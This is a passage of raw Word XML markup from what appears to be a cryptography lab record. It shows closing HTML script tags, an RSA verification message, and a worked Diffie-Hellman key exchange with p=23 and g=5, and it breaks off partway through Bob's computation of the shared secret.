        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D7CC9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E890F59" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1EAB7C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A5B24D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B6105D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289E71D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61820578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5418A78E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9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603712" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="089120FA" wp14:editId="42AACECB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1002664</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>130973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5699251" cy="2695575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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5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0E00E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E006162" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA4E6CF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043776DC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED7795D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B57BB68" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBD375C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59018F33" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDF7C02" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="254"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A52275" w14:textId="77777777" w:rsidR="00A16F47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527B227" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="238" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr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RSA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verified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>successfully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA5F3A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr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5424D7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Diffie-Hellman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given </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27160DD2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141CF03B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3538D117" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="1080"/>
      </w:pP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Diffie-Hellman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14:paraId="5FBA2809" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039EC275" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="209"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C96A62B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A71AB25" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BF7718" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
          <w:tab w:val="left" w:pos="1128"/>
        </w:tabs>
        <w:spacing w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1664" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:color w:val="090080"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>Alice</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="090080"/>
            <w:spacing w:val="-6"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="090080"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>and</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="090080"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="090080"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>Bob</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="090080"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>publicly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agree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>to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use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a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modulus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-2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8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and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base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-5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6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(which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is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a primitive root modulo 23).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D48A698" w14:textId="77777777" w:rsidR="00A16F47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27"/>
        <w:ind w:left="1079" w:hanging="311"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Alice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>chooses a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F2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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4,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>then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sends Bob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20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3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7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>a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color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BC4A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="15"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="56"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"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1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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">23 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2523ED52" w14:textId="77777777" w:rsidR="00A16F47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241"/>
        <w:ind w:left="1079" w:hanging="311"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bob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chooses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a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>secret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>integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F2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b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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sends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Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>b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color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E543489" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
        <w:ind w:left="1152"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="56"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-1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4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">23 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F704C21" w14:textId="77777777" w:rsidR="00A16F47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238"/>
        <w:ind w:left="1079" w:hanging="311"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Alice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 xml:space="preserve">computes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>s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8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>a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color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0225583F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:ind w:left="1152"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="54"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t xml:space="preserve">mod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">23 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB71C96" w14:textId="77777777" w:rsidR="00A16F47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238"/>
        <w:ind w:left="1079" w:hanging="311"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>computes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F2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s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color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>b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color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D08D13" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="18"/>
        <w:ind w:left="1152"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="56"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">23 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
